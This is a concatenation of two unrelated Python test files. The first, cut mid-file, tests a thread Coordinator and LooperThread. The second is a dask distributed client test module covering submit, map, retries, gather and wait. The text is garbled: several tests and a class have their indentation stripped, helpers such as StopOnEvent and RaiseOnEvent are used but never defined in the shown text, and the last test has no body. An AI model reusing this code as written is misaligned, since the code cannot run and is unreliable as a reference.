def RaiseOnEventUsingContextHandler(coord, wait_for_stop, set_when_stopped, ex):
  """Like RaiseOnEvent, but reports the exception via coord.stop_on_exception().

  NOTE(review): the statements after `raise ex` execute only if
  stop_on_exception() suppresses the exception -- confirm that this is
  its contract.
  """
  with coord.stop_on_exception():
    wait_for_stop.wait()
    raise ex
  if set_when_stopped:
    set_when_stopped.set()
def SleepABit(n_secs, coord=None):
  """Sleep for `n_secs`, optionally registering the current thread with `coord`."""
  me = threading.current_thread()
  if coord:
    coord.register_thread(me)
  time.sleep(n_secs)
def WaitForThreadsToRegister(coord, num_threads):
  """Poll until exactly `num_threads` threads are registered with `coord`."""
  while True:
    with coord._lock:
      registered = len(coord._registered_threads)
    if registered == num_threads:
      return
    time.sleep(0.001)
class CoordinatorTest(test.TestCase):
def testStopAPI(self):
coord = coordinator.Coordinator()
self.assertFalse(coord.should_stop())
self.assertFalse(coord.wait_for_stop(0.01))
coord.request_stop()
self.assertTrue(coord.should_stop())
self.assertTrue(coord.wait_for_stop(0.01))
def testStopAsync(self):
coord = coordinator.Coordinator()
self.assertFalse(coord.should_stop())
self.assertFalse(coord.wait_for_stop(0.1))
wait_for_stop_ev = threading.Event()
has_stopped_ev = threading.Event()
t = threading.Thread(
target=StopOnEvent, args=(coord, wait_for_stop_ev, has_stopped_ev))
t.start()
self.assertFalse(coord.should_stop())
self.assertFalse(coord.wait_for_stop(0.01))
wait_for_stop_ev.set()
has_stopped_ev.wait()
self.assertTrue(coord.wait_for_stop(0.05))
self.assertTrue(coord.should_stop())
def testJoin(self):
coord = coordinator.Coordinator()
threads = [
threading.Thread(target=SleepABit, args=(0.01,)),
threading.Thread(target=SleepABit, args=(0.02,)),
threading.Thread(target=SleepABit, args=(0.01,))
]
for t in threads:
t.start()
coord.join(threads)
for t in threads:
self.assertFalse(t.is_alive())
def testJoinAllRegistered(self):
coord = coordinator.Coordinator()
threads = [
threading.Thread(target=SleepABit, args=(0.01, coord)),
threading.Thread(target=SleepABit, args=(0.02, coord)),
threading.Thread(target=SleepABit, args=(0.01, coord))
]
for t in threads:
t.start()
WaitForThreadsToRegister(coord, 3)
coord.join()
for t in threads:
self.assertFalse(t.is_alive())
def testJoinSomeRegistered(self):
coord = coordinator.Coordinator()
threads = [
threading.Thread(target=SleepABit, args=(0.01, coord)),
threading.Thread(target=SleepABit, args=(0.02,)),
threading.Thread(target=SleepABit, args=(0.01, coord))
]
for t in threads:
t.start()
WaitForThreadsToRegister(coord, 2)
# threads[1] is not registered we must pass it in.
coord.join([threads[1]])
for t in threads:
self.assertFalse(t.is_alive())
def testJoinGraceExpires(self):
def TestWithGracePeriod(stop_grace_period):
coord = coordinator.Coordinator()
wait_for_stop_ev = threading.Event()
has_stopped_ev = threading.Event()
threads = [
threading.Thread(
target=StopOnEvent,
args=(coord, wait_for_stop_ev, has_stopped_ev)),
threading.Thread(target=SleepABit, args=(10.0,))
]
for t in threads:
t.daemon = True
t.start()
wait_for_stop_ev.set()
has_stopped_ev.wait()
with self.assertRaisesRegexp(RuntimeError, "threads still running"):
coord.join(threads, stop_grace_period_secs=stop_grace_period)
TestWithGracePeriod(1e-10)
TestWithGracePeriod(0.002)
TestWithGracePeriod(1.0)
def testJoinWithoutGraceExpires(self):
    """ignore_live_threads=True suppresses the grace-period error."""
    coord = coordinator.Coordinator()
    stop_requested = threading.Event()
    stopped = threading.Event()
    workers = [
        threading.Thread(
            target=StopOnEvent, args=(coord, stop_requested, stopped)),
        threading.Thread(target=SleepABit, args=(10.0,)),
    ]
    for worker in workers:
        worker.daemon = True
        worker.start()
    stop_requested.set()
    stopped.wait()
    coord.join(workers, stop_grace_period_secs=1., ignore_live_threads=True)
def testJoinRaiseReportExcInfo(self):
    """The first exception reported (as exc_info) is re-raised by join()."""
    coord = coordinator.Coordinator()
    ev_1 = threading.Event()
    ev_2 = threading.Event()
    threads = [
        threading.Thread(
            target=RaiseOnEvent,
            args=(coord, ev_1, ev_2, RuntimeError("First"), False)),
        threading.Thread(
            target=RaiseOnEvent,
            args=(coord, ev_2, None, RuntimeError("Too late"), False))
    ]
    for t in threads:
        t.start()
    ev_1.set()
    # assertRaisesRegexp is a deprecated alias; use assertRaisesRegex.
    with self.assertRaisesRegex(RuntimeError, "First"):
        coord.join(threads)
def testJoinRaiseReportException(self):
    """The first exception reported via request_stop is re-raised by join()."""
    coord = coordinator.Coordinator()
    ev_1 = threading.Event()
    ev_2 = threading.Event()
    threads = [
        threading.Thread(
            target=RaiseOnEvent,
            args=(coord, ev_1, ev_2, RuntimeError("First"), True)),
        threading.Thread(
            target=RaiseOnEvent,
            args=(coord, ev_2, None, RuntimeError("Too late"), True))
    ]
    for t in threads:
        t.start()
    ev_1.set()
    # assertRaisesRegexp is a deprecated alias; use assertRaisesRegex.
    with self.assertRaisesRegex(RuntimeError, "First"):
        coord.join(threads)
def testJoinIgnoresOutOfRange(self):
    """OutOfRangeError is treated as a clean stop, so join() is silent."""
    coord = coordinator.Coordinator()
    trigger = threading.Event()
    worker = threading.Thread(
        target=RaiseOnEvent,
        args=(coord, trigger, None,
              errors_impl.OutOfRangeError(None, None, "First"), True))
    worker.start()
    trigger.set()
    coord.join([worker])
def testJoinIgnoresMyExceptionType(self):
    """Types listed in clean_stop_exception_types end the run cleanly."""
    coord = coordinator.Coordinator(clean_stop_exception_types=(ValueError,))
    trigger = threading.Event()
    worker = threading.Thread(
        target=RaiseOnEvent,
        args=(coord, trigger, None, ValueError("Clean stop"), True))
    worker.start()
    trigger.set()
    coord.join([worker])
def testJoinRaiseReportExceptionUsingHandler(self):
    """Exceptions captured via the context-handler path re-raise in join()."""
    coord = coordinator.Coordinator()
    ev_1 = threading.Event()
    ev_2 = threading.Event()
    threads = [
        threading.Thread(
            target=RaiseOnEventUsingContextHandler,
            args=(coord, ev_1, ev_2, RuntimeError("First"))),
        threading.Thread(
            target=RaiseOnEventUsingContextHandler,
            args=(coord, ev_2, None, RuntimeError("Too late")))
    ]
    for t in threads:
        t.start()
    ev_1.set()
    # assertRaisesRegexp is a deprecated alias; use assertRaisesRegex.
    with self.assertRaisesRegex(RuntimeError, "First"):
        coord.join(threads)
def testClearStopClearsExceptionToo(self):
    """clear_stop() also clears a previously recorded exception.

    After the first join() re-raises "First", clear_stop() resets the
    coordinator so a second batch of threads can report a new error.
    """
    coord = coordinator.Coordinator()
    ev_1 = threading.Event()
    threads = [
        threading.Thread(
            target=RaiseOnEvent,
            args=(coord, ev_1, None, RuntimeError("First"), True)),
    ]
    for t in threads:
        t.start()
    # assertRaisesRegexp is a deprecated alias; use assertRaisesRegex.
    with self.assertRaisesRegex(RuntimeError, "First"):
        ev_1.set()
        coord.join(threads)
    coord.clear_stop()
    threads = [
        threading.Thread(
            target=RaiseOnEvent,
            args=(coord, ev_1, None, RuntimeError("Second"), True)),
    ]
    for t in threads:
        t.start()
    with self.assertRaisesRegex(RuntimeError, "Second"):
        ev_1.set()
        coord.join(threads)
def testRequestStopRaisesIfJoined(self):
    """request_stop(exc) after join() re-raises the exception immediately."""
    coord = coordinator.Coordinator()
    # Join the coordinator right away.
    coord.join([])
    reported = False
    # assertRaisesRegexp is a deprecated alias; use assertRaisesRegex.
    with self.assertRaisesRegex(RuntimeError, "Too late"):
        try:
            raise RuntimeError("Too late")
        except RuntimeError as e:
            reported = True
            coord.request_stop(e)
    self.assertTrue(reported)
    # If we clear_stop the exceptions are handled normally.
    coord.clear_stop()
    try:
        raise RuntimeError("After clear")
    except RuntimeError as e:
        coord.request_stop(e)
    with self.assertRaisesRegex(RuntimeError, "After clear"):
        coord.join([])
def testRequestStopRaisesIfJoined_ExcInfo(self):
    """Same as testRequestStopRaisesIfJoined but using sys.exc_info()."""
    coord = coordinator.Coordinator()
    # Join the coordinator right away.
    coord.join([])
    reported = False
    # assertRaisesRegexp is a deprecated alias; use assertRaisesRegex.
    with self.assertRaisesRegex(RuntimeError, "Too late"):
        try:
            raise RuntimeError("Too late")
        except RuntimeError:
            reported = True
            coord.request_stop(sys.exc_info())
    self.assertTrue(reported)
    # If we clear_stop the exceptions are handled normally.
    coord.clear_stop()
    try:
        raise RuntimeError("After clear")
    except RuntimeError:
        coord.request_stop(sys.exc_info())
    with self.assertRaisesRegex(RuntimeError, "After clear"):
        coord.join([])
def _StopAt0(coord, n):
if n[0] == 0:
coord.request_stop()
else:
n[0] -= 1
class LooperTest(test.TestCase):
    """Tests for coordinator.LooperThread target/argument handling."""

    def testTargetArgs(self):
        """loop() forwards positional args to the target each iteration."""
        n = [3]
        coord = coordinator.Coordinator()
        thread = coordinator.LooperThread.loop(
            coord, 0, target=_StopAt0, args=(coord, n))
        coord.join([thread])
        self.assertEqual(0, n[0])

    def testTargetKwargs(self):
        """loop() forwards keyword args to the target each iteration."""
        n = [3]
        coord = coordinator.Coordinator()
        thread = coordinator.LooperThread.loop(
            coord, 0, target=_StopAt0, kwargs={
                "coord": coord,
                "n": n
            })
        coord.join([thread])
        self.assertEqual(0, n[0])

    def testTargetMixedArgs(self):
        """loop() combines positional and keyword args for the target."""
        n = [3]
        coord = coordinator.Coordinator()
        thread = coordinator.LooperThread.loop(
            coord, 0, target=_StopAt0, args=(coord,), kwargs={
                "n": n
            })
        coord.join([thread])
        self.assertEqual(0, n[0])
# Standard test entry point.
if __name__ == "__main__":
    test.main()
|
test_client.py | import asyncio
import gc
import inspect
import logging
import os
import pickle
import random
import subprocess
import sys
import threading
import traceback
import warnings
import weakref
import zipfile
from collections import deque
from contextlib import suppress
from functools import partial
from operator import add
from threading import Semaphore
from time import sleep
import psutil
import pytest
from tlz import concat, first, identity, isdistinct, merge, pluck, valmap
import dask
import dask.bag as db
from dask import delayed
from dask.optimization import SubgraphCallable
from dask.utils import stringify
from distributed import (
CancelledError,
Executor,
LocalCluster,
Nanny,
TimeoutError,
Worker,
fire_and_forget,
get_client,
get_worker,
performance_report,
profile,
secede,
)
from distributed.client import (
Client,
Future,
_get_global_client,
as_completed,
default_client,
futures_of,
get_task_metadata,
temp_default_client,
tokenize,
wait,
)
from distributed.comm import CommClosedError
from distributed.compatibility import LINUX, WINDOWS
from distributed.core import Status
from distributed.metrics import time
from distributed.objects import HasWhat, WhoHas
from distributed.scheduler import (
COMPILED,
CollectTaskMetaDataPlugin,
KilledWorker,
Scheduler,
)
from distributed.sizeof import sizeof
from distributed.utils import is_valid_xml, mp_context, sync, tmp_text, tmpfile
from distributed.utils_test import (
TaskStateMetadataPlugin,
_UnhashableCallable,
async_wait_for,
asyncinc,
captured_logger,
cluster,
dec,
div,
double,
gen_cluster,
gen_test,
geninc,
inc,
map_varying,
nodebug,
popen,
pristine_loop,
randominc,
save_sys_modules,
slowadd,
slowdec,
slowinc,
throws,
varying,
wait_for,
)
pytestmark = pytest.mark.ci1
@gen_cluster(client=True)
async def test_submit(c, s, a, b):
    """submit() returns a pending Future that resolves to the call result."""
    x = c.submit(inc, 10)
    assert not x.done()
    assert isinstance(x, Future)
    assert x.client is c
    result = await x
    assert result == 11
    assert x.done()
    y = c.submit(inc, 20)
    z = c.submit(add, x, y)
    result = await z
    assert result == 11 + 21
    s.validate_state()
@gen_cluster(client=True)
async def test_map(c, s, a, b):
    """map() over iterables, futures, and keyword args yields correct results."""
    L1 = c.map(inc, range(5))
    assert len(L1) == 5
    assert isdistinct(x.key for x in L1)
    assert all(isinstance(x, Future) for x in L1)
    result = await L1[0]
    assert result == inc(0)
    assert len(s.tasks) == 5
    L2 = c.map(inc, L1)
    result = await L2[1]
    assert result == inc(inc(1))
    assert len(s.tasks) == 10
    # assert L1[0].key in s.tasks[L2[0].key]
    total = c.submit(sum, L2)
    result = await total
    assert result == sum(map(inc, map(inc, range(5))))
    L3 = c.map(add, L1, L2)
    result = await L3[1]
    assert result == inc(1) + inc(inc(1))
    L4 = c.map(add, range(3), range(4))
    results = await c.gather(L4)
    assert results == list(map(add, range(3), range(4)))

    def f(x, y=10):
        return x + y

    L5 = c.map(f, range(5), y=5)
    results = await c.gather(L5)
    assert results == list(range(5, 10))
    y = c.submit(f, 10)
    L6 = c.map(f, range(5), y=y)
    results = await c.gather(L6)
    assert results == list(range(20, 25))
    s.validate_state()
@gen_cluster(client=True)
async def test_map_empty(c, s, a, b):
    """map() over an empty iterable returns an empty list of futures."""
    L1 = c.map(inc, [], pure=False)
    assert len(L1) == 0
    results = await c.gather(L1)
    assert results == []
@gen_cluster(client=True)
async def test_map_keynames(c, s, a, b):
    """map(key=...) controls future keys, as a prefix or an explicit list."""
    futures = c.map(inc, range(4), key="INC")
    assert all(f.key.startswith("INC") for f in futures)
    assert isdistinct(f.key for f in futures)
    futures2 = c.map(inc, [5, 6, 7, 8], key="INC")
    assert [f.key for f in futures] != [f.key for f in futures2]
    keys = ["inc-1", "inc-2", "inc-3", "inc-4"]
    futures = c.map(inc, range(4), key=keys)
    assert [f.key for f in futures] == keys
@gen_cluster(client=True)
async def test_map_retries(c, s, a, b):
    """map(retries=n) retries each failing task up to n times."""
    args = [
        [ZeroDivisionError("one"), 2, 3],
        [4, 5, 6],
        [ZeroDivisionError("seven"), ZeroDivisionError("eight"), 9],
    ]
    x, y, z = c.map(*map_varying(args), retries=2)
    assert await x == 2
    assert await y == 4
    assert await z == 9
    x, y, z = c.map(*map_varying(args), retries=1, pure=False)
    assert await x == 2
    assert await y == 4
    with pytest.raises(ZeroDivisionError, match="eight"):
        await z
    x, y, z = c.map(*map_varying(args), retries=0, pure=False)
    with pytest.raises(ZeroDivisionError, match="one"):
        await x
    assert await y == 4
    with pytest.raises(ZeroDivisionError, match="seven"):
        await z
@gen_cluster(client=True)
async def test_map_batch_size(c, s, a, b):
    """map(batch_size=...) submits in batches without changing results."""
    result = c.map(inc, range(100), batch_size=10)
    result = await c.gather(result)
    assert result == list(range(1, 101))
    result = c.map(add, range(100), range(100), batch_size=10)
    result = await c.gather(result)
    assert result == list(range(0, 200, 2))
    # mismatch shape
    result = c.map(add, range(100, 200), range(10), batch_size=2)
    result = await c.gather(result)
    assert result == list(range(100, 120, 2))
@gen_cluster(client=True)
async def test_custom_key_with_batches(c, s, a, b):
    """Test of <https://github.com/dask/distributed/issues/4588>"""
    futs = c.map(
        lambda x: x ** 2,
        range(10),
        batch_size=5,
        key=[str(x) for x in range(10)],
    )
    assert len(futs) == 10
    await wait(futs)
@gen_cluster(client=True)
async def test_compute_retries(c, s, a, b):
    """compute(retries=n) retries failing delayed computations n times."""
    args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
    # Sanity check for varying() use
    x = c.compute(delayed(varying(args))())
    with pytest.raises(ZeroDivisionError, match="one"):
        await x
    # Same retries for all
    x = c.compute(delayed(varying(args))(), retries=1)
    with pytest.raises(ZeroDivisionError, match="two"):
        await x
    x = c.compute(delayed(varying(args))(), retries=2)
    assert await x == 3
    args.append(4)
    x = c.compute(delayed(varying(args))(), retries=2)
    assert await x == 3
@gen_cluster(client=True)
async def test_compute_retries_annotations(c, s, a, b):
    """dask.annotate(retries=...) applies retries to individual futures."""
    # Per-future retries
    xargs = [ZeroDivisionError("one"), ZeroDivisionError("two"), 30, 40]
    yargs = [ZeroDivisionError("five"), ZeroDivisionError("six"), 70]
    zargs = [80, 90, 100]
    with dask.annotate(retries=2):
        x = delayed(varying(xargs))()
        y = delayed(varying(yargs))()
    x, y = c.compute([x, y], optimize_graph=False)
    gc.collect()
    assert await x == 30
    with pytest.raises(ZeroDivisionError, match="five"):
        await y
    x = delayed(varying(xargs))()
    with dask.annotate(retries=2):
        y = delayed(varying(yargs))()
        z = delayed(varying(zargs))()
    x, y, z = c.compute([x, y, z], optimize_graph=False)
    with pytest.raises(ZeroDivisionError, match="one"):
        await x
    assert await y == 70
    assert await z == 80
def test_retries_get(c):
    """The sync compute(retries=...) path retries past transient errors."""
    flaky = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
    task = delayed(varying(flaky))()
    assert task.compute(retries=5) == 3
    flaky = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
    task = delayed(varying(flaky))()
    with pytest.raises(ZeroDivisionError):
        task.compute()
@gen_cluster(client=True)
async def test_compute_persisted_retries(c, s, a, b):
    """compute(retries=n) applies to already-persisted collections too."""
    args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
    # Sanity check
    x = c.persist(delayed(varying(args))())
    fut = c.compute(x)
    with pytest.raises(ZeroDivisionError, match="one"):
        await fut
    x = c.persist(delayed(varying(args))())
    fut = c.compute(x, retries=1)
    with pytest.raises(ZeroDivisionError, match="two"):
        await fut
    x = c.persist(delayed(varying(args))())
    fut = c.compute(x, retries=2)
    assert await fut == 3
    args.append(4)
    x = c.persist(delayed(varying(args))())
    fut = c.compute(x, retries=3)
    assert await fut == 3
@gen_cluster(client=True)
async def test_persist_retries(c, s, a, b):
    """persist(retries=n) retries failing tasks during persistence."""
    # Same retries for all
    args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
    x = c.persist(delayed(varying(args))(), retries=1)
    x = c.compute(x)
    with pytest.raises(ZeroDivisionError, match="two"):
        await x
    x = c.persist(delayed(varying(args))(), retries=2)
    x = c.compute(x)
    assert await x == 3
@gen_cluster(client=True)
async def test_persist_retries_annotations(c, s, a, b):
    """dask.annotate(retries=...) applies retries per key during persist."""
    # Per-key retries
    xargs = [ZeroDivisionError("one"), ZeroDivisionError("two"), 30, 40]
    yargs = [ZeroDivisionError("five"), ZeroDivisionError("six"), 70]
    zargs = [80, 90, 100]
    x = delayed(varying(xargs))()
    with dask.annotate(retries=2):
        y = delayed(varying(yargs))()
        z = delayed(varying(zargs))()
    x, y, z = c.persist([x, y, z], optimize_graph=False)
    x, y, z = c.compute([x, y, z])
    with pytest.raises(ZeroDivisionError, match="one"):
        await x
    assert await y == 70
    assert await z == 80
@gen_cluster(client=True)
async def test_retries_dask_array(c, s, a, b):
    """retries works with a dask.array computation."""
    da = pytest.importorskip("dask.array")
    x = da.ones((10, 10), chunks=(3, 3))
    future = c.compute(x.sum(), retries=2)
    y = await future
    assert y == 100
@gen_cluster(client=True)
async def test_future_repr(c, s, a, b):
    """repr and _repr_html_ of a Future include its key, status, and type."""
    pd = pytest.importorskip("pandas")
    x = c.submit(inc, 10)
    y = c.submit(pd.DataFrame, {"x": [1, 2, 3]})
    await x
    await y
    for func in [repr, lambda x: x._repr_html_()]:
        assert str(x.key) in func(x)
        assert str(x.status) in func(x)
        assert str(x.status) in repr(c.futures[x.key])
        assert "int" in func(x)
        assert "pandas" in func(y)
        assert "DataFrame" in func(y)
@gen_cluster(client=True)
async def test_future_tuple_repr(c, s, a, b):
    """Futures with tuple keys include every key element in their repr."""
    da = pytest.importorskip("dask.array")
    y = da.arange(10, chunks=(5,)).persist()
    f = futures_of(y)[0]
    for func in [repr, lambda x: x._repr_html_()]:
        for k in f.key:
            assert str(k) in func(f)
@gen_cluster(client=True)
async def test_Future_exception(c, s, a, b):
    """Future.exception() yields the task error, or None on success."""
    x = c.submit(div, 1, 0)
    result = await x.exception()
    assert isinstance(result, ZeroDivisionError)
    x = c.submit(div, 1, 1)
    result = await x.exception()
    assert result is None
def test_Future_exception_sync(c):
    """Synchronous exception() returns the task error, or None on success."""
    failed = c.submit(div, 1, 0)
    assert isinstance(failed.exception(), ZeroDivisionError)
    succeeded = c.submit(div, 1, 1)
    assert succeeded.exception() is None
@gen_cluster(client=True)
async def test_Future_release(c, s, a, b):
    """release() promptly removes finished, running, and erred futures."""
    # Released Futures should be removed timely from the Client
    x = c.submit(div, 1, 1)
    await x
    x.release()
    await asyncio.sleep(0)
    assert not c.futures
    x = c.submit(slowinc, 1, delay=0.5)
    x.release()
    await asyncio.sleep(0)
    assert not c.futures
    x = c.submit(div, 1, 0)
    await x.exception()
    x.release()
    await asyncio.sleep(0)
    assert not c.futures
def test_Future_release_sync(c):
    """Synchronous release() promptly drops futures from the client."""
    # Released Futures should be removed timely from the Client
    x = c.submit(div, 1, 1)
    x.result()
    x.release()
    wait_for(lambda: not c.futures, timeout=0.3)
    x = c.submit(slowinc, 1, delay=0.8)
    x.release()
    wait_for(lambda: not c.futures, timeout=0.3)
    x = c.submit(div, 1, 0)
    x.exception()
    x.release()
    wait_for(lambda: not c.futures, timeout=0.3)
def test_short_tracebacks(loop, c):
    """Remote exceptions carry a truncated traceback (fewer than 5 frames)."""
    tblib = pytest.importorskip("tblib")
    future = c.submit(div, 1, 0)
    try:
        future.result()
    except Exception:
        _, _, tb = sys.exc_info()
    tb = tblib.Traceback(tb).to_dict()
    n = 0
    while tb is not None:
        n += 1
        tb = tb["tb_next"]
    assert n < 5
@gen_cluster(client=True)
async def test_map_naming(c, s, a, b):
    """Pure map() calls share keys/states; pure=False forces distinct ones."""
    L1 = c.map(inc, range(5))
    L2 = c.map(inc, range(5))
    assert [x.key for x in L1] == [x.key for x in L2]
    L3 = c.map(inc, [1, 1, 1, 1])
    assert len({x._state for x in L3}) == 1
    L4 = c.map(inc, [1, 1, 1, 1], pure=False)
    assert len({x._state for x in L4}) == 4
@gen_cluster(client=True)
async def test_submit_naming(c, s, a, b):
    """Identical pure submissions share state; pure=False gets a new key."""
    a = c.submit(inc, 1)
    b = c.submit(inc, 1)
    assert a._state is b._state
    c = c.submit(inc, 1, pure=False)
    assert c.key != a.key
@gen_cluster(client=True)
async def test_exceptions(c, s, a, b):
    """A failed task raises its exception; the client keeps working after."""
    x = c.submit(div, 1, 2)
    result = await x
    assert result == 1 / 2
    x = c.submit(div, 1, 0)
    with pytest.raises(ZeroDivisionError):
        await x
    x = c.submit(div, 10, 2)  # continues to operate
    result = await x
    assert result == 10 / 2
@gen_cluster()
async def test_gc(s, a, b):
    """Deleting a Future releases its data from the scheduler's records."""
    c = await Client(s.address, asynchronous=True)
    x = c.submit(inc, 10)
    await x
    assert s.tasks[x.key].who_has
    x.__del__()
    await async_wait_for(
        lambda: x.key not in s.tasks or not s.tasks[x.key].who_has, timeout=0.3
    )
    await c.close()
def test_thread(c):
    """result() works synchronously and honors its timeout argument."""
    x = c.submit(inc, 1)
    assert x.result() == 2
    x = c.submit(slowinc, 1, delay=0.3)
    with pytest.raises(TimeoutError):
        x.result(timeout="10 ms")
    assert x.result() == 2
def test_sync_exceptions(c):
    """A failed task raises on result(); later submissions still work.

    The middle submission divides by zero; its error must surface from
    result() without poisoning subsequent submissions.
    """
    x = c.submit(div, 10, 2)
    assert x.result() == 5
    y = c.submit(div, 10, 0)
    # pytest.raises replaces the try/assert False/except boilerplate.
    with pytest.raises(ZeroDivisionError):
        y.result()
    z = c.submit(div, 10, 5)
    assert z.result() == 2
@gen_cluster(client=True)
async def test_gather(c, s, a, b):
    """gather() resolves single futures, lists, and nested containers."""
    x = c.submit(inc, 10)
    y = c.submit(inc, x)
    result = await c.gather(x)
    assert result == 11
    result = await c.gather([x])
    assert result == [11]
    result = await c.gather({"x": x, "y": [y]})
    assert result == {"x": 11, "y": [12]}
@gen_cluster(client=True)
async def test_gather_lost(c, s, a, b):
    """gather() errors when a worker holding scattered data has closed."""
    [x] = await c.scatter([1], workers=a.address)
    y = c.submit(inc, 1, workers=b.address)
    await a.close()
    with pytest.raises(Exception):
        await c.gather([x, y])
def test_gather_sync(c):
    """Sync gather() raises on errors, or skips them with errors='skip'."""
    x = c.submit(inc, 1)
    assert c.gather(x) == 2
    y = c.submit(div, 1, 0)
    with pytest.raises(ZeroDivisionError):
        c.gather([x, y])
    [xx] = c.gather([x, y], errors="skip")
    assert xx == 2
@gen_cluster(client=True)
async def test_gather_strict(c, s, a, b):
    """Async gather() raises on errors, or skips them with errors='skip'."""
    x = c.submit(div, 2, 1)
    y = c.submit(div, 1, 0)
    with pytest.raises(ZeroDivisionError):
        await c.gather([x, y])
    [xx] = await c.gather([x, y], errors="skip")
    assert xx == 2
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)])
async def test_gather_skip(c, s, a):
    """errors='skip' drops failed futures without logging noise."""
    x = c.submit(div, 1, 0, priority=10)
    y = c.submit(slowinc, 1, delay=0.5)
    with captured_logger(logging.getLogger("distributed.scheduler")) as sched:
        with captured_logger(logging.getLogger("distributed.client")) as client:
            L = await c.gather([x, y], errors="skip")
            assert L == [2]
    assert not client.getvalue()
    assert not sched.getvalue()
@gen_cluster(client=True)
async def test_limit_concurrent_gathering(c, s, a, b):
    """Gathering many futures batches transfers instead of one per future."""
    futures = c.map(inc, range(100))
    await c.gather(futures)
    assert len(a.outgoing_transfer_log) + len(b.outgoing_transfer_log) < 100
@gen_cluster(client=True)
async def test_get(c, s, a, b):
    """get(sync=False) handles single keys, key lists, and empty graphs."""
    future = c.get({"x": (inc, 1)}, "x", sync=False)
    assert isinstance(future, Future)
    result = await future
    assert result == 2
    futures = c.get({"x": (inc, 1)}, ["x"], sync=False)
    assert isinstance(futures[0], Future)
    result = await c.gather(futures)
    assert result == [2]
    futures = c.get({}, [], sync=False)
    result = await c.gather(futures)
    assert result == []
    result = await c.get(
        {("x", 1): (inc, 1), ("x", 2): (inc, ("x", 1))}, ("x", 2), sync=False
    )
    assert result == 3
def test_get_sync(c):
    """The synchronous get() computes a trivial one-task graph."""
    result = c.get({"x": (inc, 1)}, "x")
    assert result == 2
def test_no_future_references(c):
    """The client holds no references to futures the user has dropped.

    All futures go into a WeakSet; after the local list is deleted and
    garbage collected, the weak references must empty out.
    """
    from weakref import WeakSet

    ws = WeakSet()
    futures = c.map(inc, range(10))
    ws.update(futures)
    del futures
    # gc is already imported at module scope; the local import was redundant.
    gc.collect()
    start = time()
    while list(ws):
        sleep(0.01)
        assert time() < start + 30
def test_get_sync_optimize_graph_passes_through(c):
    """dask.compute(optimize_graph=False) passes through the sync get()."""
    bag = db.range(10, npartitions=3).map(inc)
    dask.compute(bag.sum(), optimize_graph=False)
@gen_cluster(client=True)
async def test_gather_errors(c, s, a, b):
    """gather() re-raises the original exception type from failed tasks."""
    def f(a, b):
        raise TypeError

    def g(a, b):
        raise AttributeError

    future_f = c.submit(f, 1, 2)
    future_g = c.submit(g, 1, 2)
    with pytest.raises(TypeError):
        await c.gather(future_f)
    with pytest.raises(AttributeError):
        await c.gather(future_g)
    await a.close()
@gen_cluster(client=True)
async def test_wait(c, s, a, b):
    """wait() blocks until every future in the collection has finished."""
    x = c.submit(inc, 1)
    y = c.submit(inc, 1)
    z = c.submit(inc, 2)
    done, not_done = await wait([x, y, z])
    assert done == {x, y, z}
    assert not_done == set()
    assert x.status == y.status == "finished"
@gen_cluster(client=True)
async def test_wait_first_completed(c, s, a, b):
    """wait(return_when='FIRST_COMPLETED') returns after the fastest future."""
    x = c.submit(slowinc, 1)
    y = c.submit(slowinc, 1)
    z = c.submit(inc, 2)
    done, not_done = await wait([x, y, z], return_when="FIRST_COMPLETED")
    assert done == {z}
    assert not_done == {x, y}
    assert z.status == "finished"
    assert x.status == "pending"
    assert y.status == "pending"
@gen_cluster(client=True)
async def test_wait_timeout(c, s, a, b):
    """wait(timeout=...) raises TimeoutError when the future is too slow."""
    future = c.submit(sleep, 0.3)
    with pytest.raises(TimeoutError):
        await wait(future, timeout=0.01)
def test_wait_sync(c):
    """Synchronous wait() finishes futures and honors its timeout."""
    x = c.submit(inc, 1)
    y = c.submit(inc, 2)
    done, not_done = wait([x, y])
    assert done == {x, y}
    assert not_done == set()
    assert x.status == y.status == "finished"
    future = c.submit(sleep, 0.3)
    with pytest.raises(TimeoutError):
        wait(future, timeout=0.01)
def test_wait_informative_error_for_timeouts(c):
    """Misusing wait(x, y) produces an error mentioning 'timeout' and 'list'.

    wait() takes a collection plus a timeout keyword; passing two futures
    positionally must fail with a message that points the user at both.
    """
    x = c.submit(inc, 1)
    y = c.submit(inc, 2)
    # The original try/except silently passed when no exception was raised;
    # pytest.raises makes a missing error fail the test.
    with pytest.raises(Exception) as excinfo:
        wait(x, y)
    assert "timeout" in str(excinfo.value)
    assert "list" in str(excinfo.value)
@gen_cluster(client=True)
async def test_garbage_collection(c, s, a, b):
    """Client refcounts drop as futures are deleted; shared data survives."""
    x = c.submit(inc, 1)
    y = c.submit(inc, 1)
    # x and y are the same pure task, so they share one key with refcount 2.
    assert c.refcount[x.key] == 2
    x.__del__()
    await asyncio.sleep(0)
    assert c.refcount[x.key] == 1
    z = c.submit(inc, y)
    y.__del__()
    await asyncio.sleep(0)
    result = await z
    assert result == 3
    ykey = y.key
    y.__del__()
    await asyncio.sleep(0)
    assert ykey not in c.futures
@gen_cluster(client=True)
async def test_garbage_collection_with_scatter(c, s, a, b):
    """Deleting a scattered future releases its data cluster-wide."""
    [future] = await c.scatter([1])
    assert future.key in c.futures
    assert future.status == "finished"
    assert s.who_wants[future.key] == {c.id}
    key = future.key
    assert c.refcount[key] == 1
    future.__del__()
    await asyncio.sleep(0)
    assert c.refcount[key] == 0
    while key in s.tasks and s.tasks[key].who_has:
        await asyncio.sleep(0.1)
@gen_cluster(client=True)
async def test_recompute_released_key(c, s, a, b):
    """A key released everywhere can be recomputed with the same result."""
    x = c.submit(inc, 100)
    result1 = await x
    xkey = x.key
    del x
    # gc is already imported at module scope; the local import was redundant.
    gc.collect()
    await asyncio.sleep(0)
    assert c.refcount[xkey] == 0
    # 1 second batching needs a second action to trigger
    while xkey in s.tasks and s.tasks[xkey].who_has or xkey in a.data or xkey in b.data:
        await asyncio.sleep(0.1)
    x = c.submit(inc, 100)
    assert x.key in c.futures
    result2 = await x
    assert result1 == result2
@pytest.mark.slow
@gen_cluster(client=True)
async def test_long_tasks_dont_trigger_timeout(c, s, a, b):
    """A task sleeping for several seconds completes without a timeout."""
    # sleep is already imported at module scope (from time import sleep);
    # the function-local re-import was redundant.
    x = c.submit(sleep, 3)
    await x
@pytest.mark.skip
@gen_cluster(client=True)
async def test_missing_data_heals(c, s, a, b):
